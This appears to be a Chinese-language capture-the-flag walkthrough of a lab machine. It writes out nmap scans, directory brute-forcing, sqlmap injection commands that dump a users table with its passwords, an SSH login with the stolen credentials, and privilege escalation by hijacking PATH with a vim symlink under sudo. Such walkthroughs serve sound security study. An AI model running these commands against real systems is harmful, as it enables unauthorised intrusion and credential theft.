0x01:埠掃描
nmap -sn 10.10.10.0/24
全埠掃描
nmap --min-rate 10000 -p- 10.10.10.129
UDP掃描
nmap -sU --top=20 10.10.10.129
詳細埠掃描
nmap -sT -sC -sV -O --min-rate 10000 -p22,8080 10.10.10.129
漏洞掃描
nmap --script=vuln -p22,8080 10.10.10.129
0x02:web滲透
先掃目錄
dirsearch -u http://10.10.10.129:8080
gobuster dir -u http://10.10.10.129:8080 -x php,zip,rar,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
先檢視/robots.txt
沒掃到啥有用的東西呢,我們在手動嘗試一些其他的目錄呢
報錯給了我們一個特別的目錄/mercuryfacts,我們檢視
逐一搜尋檢視,See list有提示資料庫為mysql
Load a fact發現sql注入報錯
sqlmap -u "http://10.10.10.129:8080/mercuryfacts/1*/" --dbs
sqlmap -u "http://10.10.10.129:8080/mercuryfacts/1*/" -D mercury -T users --dump
拿到憑證
john@johnny1987
laura@lovemykids111
sam@lovemybeer111
webmaster@mercuryisthesizeof0.056Earths
嘗試登入,最後成功以webmaster使用者成功登入ssh
0x03:許可權提升
檢視許可權
sudo -l
找到notes.txt,告訴了我們linuxmaster的密碼,是base64
linuxmaster@mercurymeandiameteris4880km
成功橫向移動
檢視許可權
可惜他沒有寫許可權
我們可以透過劫持環境變數,將tail替換成vim,從而實現提權
我們先建立軟連結
ln -s /usr/bin/vim tail
然後設定當前環境變數
export PATH=$(pwd):$PATH
最後執行
sudo --preserve-env=PATH /usr/bin/check_syslog.sh
--preserve-env=PATH:用於控制在執行命令時是否保留當前使用者的環境變數,因為 sudo 命令會使用安全的預設 的PATH路徑,所以我們要加上它
0x04:思考總結
1.靶機Django沒關debug導致輸入不存在目錄出現隱藏目錄
2.這臺靶機也可以使用Pwnkit指令碼提權